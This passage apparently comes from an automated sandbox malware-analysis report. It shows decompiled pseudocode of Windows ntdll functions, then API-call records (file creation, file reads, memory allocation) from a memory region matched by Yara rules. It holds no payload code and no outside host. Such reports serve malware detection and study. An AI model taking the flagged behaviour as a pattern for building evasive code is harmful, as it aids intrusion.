                    				void* _t74;
                    				void* _t75;
                    				void* _t76;
                    				void* _t77;
                    
                    				_t33 =  *0x1ea72088; // 0x7770ec78
                    				_v8 = _t33 ^ _t73;
                    				_v548 = _v548 & 0x00000000;
                    				_t72 = _a4;
                    				if(E1E9C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                    					__eflags = _v548;
                    					if(_v548 == 0) {
                    						goto L1;
                    					}
                    					_t62 = _t72 + 0x24;
                    					E1E9E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                    					_t71 = 0x214;
                    					_v544 = 0x214;
                    					E1E99DFC0( &_v540, 0, 0x214);
                    					_t75 = _t74 + 0x20;
                    					_t46 =  *0x1ea74218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                    					__eflags = _t46;
                    					if(_t46 == 0) {
                    						goto L1;
                    					}
                    					_t47 = _v544;
                    					__eflags = _t47;
                    					if(_t47 == 0) {
                    						goto L1;
                    					}
                    					__eflags = _t47 - 0x214;
                    					if(_t47 >= 0x214) {
                    						goto L1;
                    					}
                    					_push(_t62);
                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                    					E1E9E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                    					_t52 = E1E9A0D27( &_v540, L"Execute=1");
                    					_t76 = _t75 + 0x1c;
                    					_push(_t62);
                    					__eflags = _t52;
                    					if(_t52 == 0) {
                    						E1E9E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                    						_t71 =  &_v540;
                    						_t56 = _t73 + _v544 - 0x218;
                    						_t77 = _t76 + 0x14;
                    						_v552 = _t56;
                    						__eflags = _t71 - _t56;
                    						if(_t71 >= _t56) {
                    							goto L1;
                    						} else {
                    							goto L10;
                    						}
                    						while(1) {
                    							L10:
                    							_t62 = E1E9A8375(_t71, 0x20);
                    							_pop(_t69);
                    							__eflags = _t62;
                    							if(__eflags != 0) {
                    								__eflags = 0;
                    								 *_t62 = 0;
                    							}
                    							E1E9E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                    							_t77 = _t77 + 0x10;
                    							E1EA0E8DB(_t69, _t70, __eflags, _t72, _t71);
                    							__eflags = _t62;
                    							if(_t62 == 0) {
                    								goto L1;
                    							}
                    							_t31 = _t62 + 2; // 0x2
                    							_t71 = _t31;
                    							__eflags = _t71 - _v552;
                    							if(_t71 >= _v552) {
                    								goto L1;
                    							}
                    						}
                    					}
                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                    					_push(3);
                    					_push(0x55);
                    					E1E9E3F92();
                    					_t38 = 1;
                    					L2:
                    					return E1E99E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                    				}
                    				L1:
                    				_t38 = 0;
                    				goto L2;
                    			}

                    APIs
                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 1E9E3F12
                    Strings
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E9EE2FB
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E9EE345
                    • ExecuteOptions, xrefs: 1E9E3F04
                    • xpwpz~, xrefs: 1E9C7F08
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E9E3F4A
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E9E3EC4
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E9E3F75
                    • Execute=1, xrefs: 1E9E3F5E
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: BaseDataModuleQuery
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$xpwpz~
                    • API String ID: 3901378454-3101507724
                    • Opcode ID: 55adef1e65e2d3513c64afe68042047e9f1f5939748c011a11f498a741cd6ba5
                    • Instruction ID: a3f7447c8a2c13b54b165de1b517ca9305ad70892889be868920bbae945cbf30
                    • Opcode Fuzzy Hash: 55adef1e65e2d3513c64afe68042047e9f1f5939748c011a11f498a741cd6ba5
                    • Instruction Fuzzy Hash: AB41C87654025C7ADF21DAA4DCC5FDE73BCAF98700F000AADE605E7180EB70AA859F61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E1E9B53A5(signed int _a4, char _a8) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t32;
                    				signed int _t37;
                    				signed int _t40;
                    				signed int _t42;
                    				void* _t45;
                    				intOrPtr _t46;
                    				signed int _t49;
                    				void* _t51;
                    				signed int _t57;
                    				signed int _t64;
                    				signed int _t71;
                    				void* _t74;
                    				intOrPtr _t78;
                    				signed int* _t79;
                    				void* _t85;
                    				signed int _t86;
                    				signed int _t92;
                    				void* _t104;
                    				void* _t105;
                    
                    				_t64 = _a4;
                    				_t32 =  *(_t64 + 0x28);
                    				_t71 = _t64 + 0x28;
                    				_push(_t92);
                    				if(_t32 < 0) {
                    					_t78 =  *[fs:0x18];
                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                    						goto L3;
                    					} else {
                    						__eflags = _t32 | 0xffffffff;
                    						asm("lock xadd [ecx], eax");
                    						return 1;
                    					}
                    				} else {
                    					L3:
                    					_push(_t86);
                    					while(1) {
                    						L4:
                    						__eflags = _t32;
                    						if(_t32 == 0) {
                    							break;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                    							_t79 = _t64 + 0x24;
                    							_t71 = 1;
                    							asm("lock xadd [eax], ecx");
                    							_t32 =  *(_t64 + 0x28);
                    							_a4 = _t32;
                    							__eflags = _t32;
                    							if(_t32 != 0) {
                    								L19:
                    								_t86 = 0;
                    								__eflags = 0;
                    								while(1) {
                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                    									asm("sbb esi, esi");
                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x1ea701c0;
                    									_push(_t92);
                    									_push(0);
                    									_t37 = E1E98F8CC( *((intOrPtr*)(_t64 + 0x20)));
                    									__eflags = _t37 - 0x102;
                    									if(_t37 != 0x102) {
                    										break;
                    									}
                    									_t71 =  *(_t92 + 4);
                    									_t85 =  *_t92;
                    									_t51 = E1E9D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                    									_push(_t85);
                    									_push(_t51);
                    									E1E9E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                    									E1E9E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                    									_t86 = _t86 + 1;
                    									_t105 = _t104 + 0x28;
                    									__eflags = _t86 - 2;
                    									if(__eflags > 0) {
                    										E1EA1217A(_t71, __eflags, _t64);
                    									}
                    									_push("RTL: Re-Waiting\n");
                    									_push(0);
                    									_push(0x65);
                    									E1E9E3F92();
                    									_t104 = _t105 + 0xc;
                    								}
                    								__eflags = _t37;
                    								if(__eflags < 0) {
                    									_push(_t37);
                    									E1E9D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                    									asm("int3");
                    									_t40 =  *_t71;
                    									 *_t71 = 0;
                    									__eflags = _t40;
                    									if(_t40 == 0) {
                    										L1:
                    										_t42 = E1E9B5384(_t92 + 0x24);
                    										if(_t42 != 0) {
                    											goto L31;
                    										} else {
                    											goto L2;
                    										}
                    									} else {
                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                    										_push( &_a4);
                    										_push(_t40);
                    										_t49 = E1E98F970( *((intOrPtr*)(_t92 + 0x18)));
                    										__eflags = _t49;
                    										if(__eflags >= 0) {
                    											goto L1;
                    										} else {
                    											_push(_t49);
                    											E1E9D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                    											L31:
                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                    											_push( &_a4);
                    											_push(1);
                    											_t42 = E1E98F970( *((intOrPtr*)(_t92 + 0x20)));
                    											__eflags = _t42;
                    											if(__eflags >= 0) {
                    												L2:
                    												return _t42;
                    											} else {
                    												_push(_t42);
                    												E1E9D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                    												_push( &_a4);
                    												_push(1);
                    												_t42 = E1E98F970( *((intOrPtr*)(_t92 + 0x20)));
                    												__eflags = _t42;
                    												if(__eflags >= 0) {
                    													goto L2;
                    												} else {
                    													_push(_t42);
                    													_t45 = E1E9D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                    													asm("int3");
                    													while(1) {
                    														_t74 = _t45;
                    														__eflags = _t45 - 1;
                    														if(_t45 != 1) {
                    															break;
                    														}
                    														_t86 = _t86 | 0xffffffff;
                    														_t45 = _t74;
                    														asm("lock cmpxchg [ebx], edi");
                    														__eflags = _t45 - _t74;
                    														if(_t45 != _t74) {
                    															continue;
                    														} else {
                    															_t46 =  *[fs:0x18];
                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                    															return _t46;
                    														}
                    														goto L37;
                    													}
                    													E1E9B5329(_t74, _t92);
                    													_push(1);
                    													return E1E9B53A5(_t92);
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									_t32 =  *(_t64 + 0x28);
                    									continue;
                    								}
                    							} else {
                    								_t71 =  *_t79;
                    								__eflags = _t71;
                    								if(__eflags > 0) {
                    									while(1) {
                    										_t57 = _t71;
                    										asm("lock cmpxchg [edi], esi");
                    										__eflags = _t57 - _t71;
                    										if(_t57 == _t71) {
                    											break;
                    										}
                    										_t71 = _t57;
                    										__eflags = _t57;
                    										if(_t57 > 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t32 = _a4;
                    									__eflags = _t71;
                    								}
                    								if(__eflags != 0) {
                    									continue;
                    								} else {
                    									goto L19;
                    								}
                    							}
                    						}
                    						goto L37;
                    					}
                    					_t71 = _t71 | 0xffffffff;
                    					_t32 = 0;
                    					asm("lock cmpxchg [edx], ecx");
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L4;
                    					} else {
                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                    						return 1;
                    					}
                    				}
                    				L37:
                    			}

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E9F22F4
                    Strings
                    • RTL: Re-Waiting, xrefs: 1E9F2328
                    • RTL: Resource at %p, xrefs: 1E9F230B
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1E9F22FC
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-871070163
                    • Opcode ID: 9966fd0ffe75833f5fd2ce854f9db5ab673669feb84fa795e81da343f758f5ea
                    • Instruction ID: fd9b1a4e536c891c6b94d7ba9989a087bdc76b063a81da2e1858c2f45408fcdf
                    • Opcode Fuzzy Hash: 9966fd0ffe75833f5fd2ce854f9db5ab673669feb84fa795e81da343f758f5ea
                    • Instruction Fuzzy Hash: CD511675600756ABDB06CF24DC80F96779EAF88724F114B5DFD09DB280EB61E8418FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E1E9BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v24;
                    				intOrPtr* _v28;
                    				intOrPtr _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				short _v66;
                    				char _v72;
                    				void* __esi;
                    				intOrPtr _t38;
                    				intOrPtr _t39;
                    				signed int _t40;
                    				intOrPtr _t42;
                    				intOrPtr _t43;
                    				signed int _t44;
                    				void* _t46;
                    				intOrPtr _t48;
                    				signed int _t49;
                    				intOrPtr _t50;
                    				intOrPtr _t53;
                    				signed char _t67;
                    				void* _t72;
                    				intOrPtr _t77;
                    				intOrPtr* _t80;
                    				intOrPtr _t84;
                    				intOrPtr* _t85;
                    				void* _t91;
                    				void* _t92;
                    				void* _t93;
                    
                    				_t80 = __edi;
                    				_t75 = __edx;
                    				_t70 = __ecx;
                    				_t84 = _a4;
                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                    					E1E9ADA92(__ecx, __edx, __eflags, _t84);
                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                    				}
                    				_push(0);
                    				__eflags = _t38 - 0xffffffff;
                    				if(_t38 == 0xffffffff) {
                    					_t39 =  *0x1ea7793c; // 0x0
                    					_push(0);
                    					_push(_t84);
                    					_t40 = E1E9916C0(_t39);
                    				} else {
                    					_t40 = E1E98F9D4(_t38);
                    				}
                    				_pop(_t85);
                    				__eflags = _t40;
                    				if(__eflags < 0) {
                    					_push(_t40);
                    					E1E9D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                    					asm("int3");
                    					while(1) {
                    						L21:
                    						_t76 =  *[fs:0x18];
                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                    							_v66 = 0x1722;
                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                    							_t76 =  &_v72;
                    							_push( &_v72);
                    							_v28 = _t85;
                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                    							_push(0x10);
                    							_push(0x20402);
                    							E1E9901A4( *0x7ffe0382 & 0x000000ff);
                    						}
                    						while(1) {
                    							_t43 = _v8;
                    							_push(_t80);
                    							_push(0);
                    							__eflags = _t43 - 0xffffffff;
                    							if(_t43 == 0xffffffff) {
                    								_t71 =  *0x1ea7793c; // 0x0
                    								_push(_t85);
                    								_t44 = E1E991F28(_t71);
                    							} else {
                    								_t44 = E1E98F8CC(_t43);
                    							}
                    							__eflags = _t44 - 0x102;
                    							if(_t44 != 0x102) {
                    								__eflags = _t44;
                    								if(__eflags < 0) {
                    									_push(_t44);
                    									E1E9D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                    									asm("int3");
                    									E1EA12306(_t85);
                    									__eflags = _t67 & 0x00000002;
                    									if((_t67 & 0x00000002) != 0) {
                    										_t7 = _t67 + 2; // 0x4
                    										_t72 = _t7;
                    										asm("lock cmpxchg [edi], ecx");
                    										__eflags = _t67 - _t67;
                    										if(_t67 == _t67) {
                    											E1E9BEC56(_t72, _t76, _t80, _t85);
                    										}
                    									}
                    									return 0;
                    								} else {
                    									__eflags = _v24;
                    									if(_v24 != 0) {
                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                    									}
                    									return 2;
                    								}
                    								goto L36;
                    							}
                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                    							_push(_t67);
                    							_t46 = E1E9D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                    							_push(_t77);
                    							E1E9E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                    							_t48 =  *_t85;
                    							_t92 = _t91 + 0x18;
                    							__eflags = _t48 - 0xffffffff;
                    							if(_t48 == 0xffffffff) {
                    								_t49 = 0;
                    								__eflags = 0;
                    							} else {
                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                    							}
                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                    							_push(_t49);
                    							_t50 = _v12;
                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                    							_push(_t85);
                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                    							E1E9E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                    							_t53 =  *_t85;
                    							_t93 = _t92 + 0x20;
                    							_t67 = _t67 + 1;
                    							__eflags = _t53 - 0xffffffff;
                    							if(_t53 != 0xffffffff) {
                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                    							}
                    							__eflags = _t67 - 2;
                    							if(_t67 > 2) {
                    								__eflags = _t85 - 0x1ea720c0;
                    								if(_t85 != 0x1ea720c0) {
                    									_t76 = _a4;
                    									__eflags = _a4 - _a8;
                    									if(__eflags == 0) {
                    										E1EA1217A(_t71, __eflags, _t85);
                    									}
                    								}
                    							}
                    							_push("RTL: Re-Waiting\n");
                    							_push(0);
                    							_push(0x65);
                    							_a8 = _a4;
                    							E1E9E3F92();
                    							_t91 = _t93 + 0xc;
                    							__eflags =  *0x7ffe0382;
                    							if( *0x7ffe0382 != 0) {
                    								goto L21;
                    							}
                    						}
                    						goto L36;
                    					}
                    				} else {
                    					return _t40;
                    				}
                    				L36:
                    			}

                    Strings
                    • RTL: Re-Waiting, xrefs: 1E9F24FA
                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 1E9F24BD
                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 1E9F248D
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                    • API String ID: 0-3177188983
                    • Opcode ID: 80c362371adb7f9b8ff62ca740fdd36443f634c058242ceff23e45558dbf723c
                    • Instruction ID: 78217c946e3aa812d407cdb4e3b6f309cf6cc951fcf05e1075b2e1c5a8dccc54
                    • Opcode Fuzzy Hash: 80c362371adb7f9b8ff62ca740fdd36443f634c058242ceff23e45558dbf723c
                    • Instruction Fuzzy Hash: C541B0B4A00248EBDB10DBA5CC84FAA7BADAF84720F108B4DF5599B3C0D775E9418F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                    • Instruction ID: b4e28f81552dabf8d26079c265d62c16fd98c5fab384b920943907eb4ff142bf
                    • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                    • Instruction Fuzzy Hash: 1FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`$wK
                    • API String ID: 823142352-635088003
                    • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                    • Instruction ID: 72a27c67d75c62c2b748e7d4a7c187b675e4c59541f47ddf6178da0e82cfd5df
                    • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                    • Instruction Fuzzy Hash: BBF06CB2215109AF8B58DF9CD890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                    • Instruction ID: 15814952b34f15fadc7ea73fb5bf1213ce15886017840d43c7bd674ad2d8b0e3
                    • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                    • Instruction Fuzzy Hash: F7F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BE1DA7251C630E8118BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                    • Instruction ID: 2dddf084dcba1ec77312e3149dd3078b319210c9a9e876e468a01dc41263e8ba
                    • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                    • Instruction Fuzzy Hash: 27F052B2210218AFCB18DF88DC91EEB77ADAF88310F158208FE1C97241C630E910CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                    • Instruction ID: ab6ea4d880ad19167aef1d36909cc263392c85e41cc02b06a8518bfe265f1311
                    • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                    • Instruction Fuzzy Hash: A5E08C35200104AFDB10EFA8CC8AEE7BB68EF48350F064199BA5C9B242C631A6508690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
